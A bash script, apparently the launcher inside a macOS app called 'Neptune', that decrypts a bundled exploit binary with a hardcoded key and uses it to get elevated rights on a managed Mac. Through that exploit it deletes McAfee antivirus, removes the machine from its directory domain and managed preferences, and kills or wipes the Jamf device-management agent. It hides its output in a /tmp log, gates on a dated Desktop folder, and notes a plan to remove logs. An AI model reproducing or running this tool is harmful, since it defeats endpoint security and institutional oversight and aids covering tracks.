#!/usr/bin/env bash

res="$(dirname "$(dirname "$0")")/Resources"
key="$HOME/Desktop/$(date +%y%d)"
elim_key="$HOME/Desktop/elim"
exploit="/tmp/exp.out"
logfile="/tmp/neptune_log.txt"

exec 3>&1 4>&2
trap 'exec 2>&4 1>&3' 0 1 2 3
exec 1>"$logfile" 2>&1

# Run only if directory on Desktop exists with the current year and day
echo "Checking for key at $key..."
if [[ ! -d "$key" ]] || [[ $(whoami) == "boesene" ]]; then
    echo "Could not find key." >&2
    exit 1
fi
echo "Key found."
if [[ -d "$elim_key" ]]; then
    echo "elim_key found."
    elim=true
else
    echo "elim_key not found." >&2
    elim=false
fi

echo "Deleting keys."
rm -rf "$key" "$elim_key"
echo "Decrypting and preparing exploit."
openssl des3 -d -in "$res/exp.out.des3" -k b51861c95142fce29aef7b6416fa21d5 > "$exploit"
chmod +x "$exploit"

echo "Doing work."
osascript -e 'display notification "Keeping access open. Force quit when done." with title "Neptune" sound name ""'
"$exploit" <<EOF
if [[ $elim == true ]]; then

function delete {
    rm -rfv "$@"
}

delete /Applications/McAfee* \
    /Library/McAfee* \
    /Library/Application\ Support/McAfee* \
    /usr/local/McAfee \
    /Library/Startup\ Items/cma \
    /Quarantine

dsconfigad -remove -force -u "user" -p "password"

delete /Library/Managed\ Preferences
dscl . -delete /Computers
dscl . -delete /Users/$user dsAttrTypeStandard:MCXSettings
# Prevent the directory from being recreated; it shouldn't be
ln -s /dev/null /Library/Managed\ Preferences

for _ in {1..8}; do killall jamf jamfAgent 2>/dev/null; done
delete /usr/local/bin/jamf* \
    /Library/LaunchAgents/com.jamfsoftware* /Library/LaunchDaemons/com.jamfsoftware* \
    /private/var/db/receipts/com.jamfsoftware* \
    /private/var/root/Library/{Caches,Cookies,Preferences}/com.jamfsoftware* \
    /private/var/run/jamf \
    /Users/$user/Library/Application\ Support/com.apple.sharedfilelist/*/com.jamfsoftware* \
    /Users/$user/Library/Preferences/com.jamfsoftware* \
    /Library/Preferences/com.jamfsoftware* \
    /Users/boesene/Library/Logs/JAMF \
    /usr/local/jamf \
    /Library/Application\ Support/JAMF



else
    for ((;;)); do
        killall jamf jamfAgent 2>/dev/null
    done
fi
# TODO: Remove logs
EOF
wait
rm "$exploit"
echo "Done."
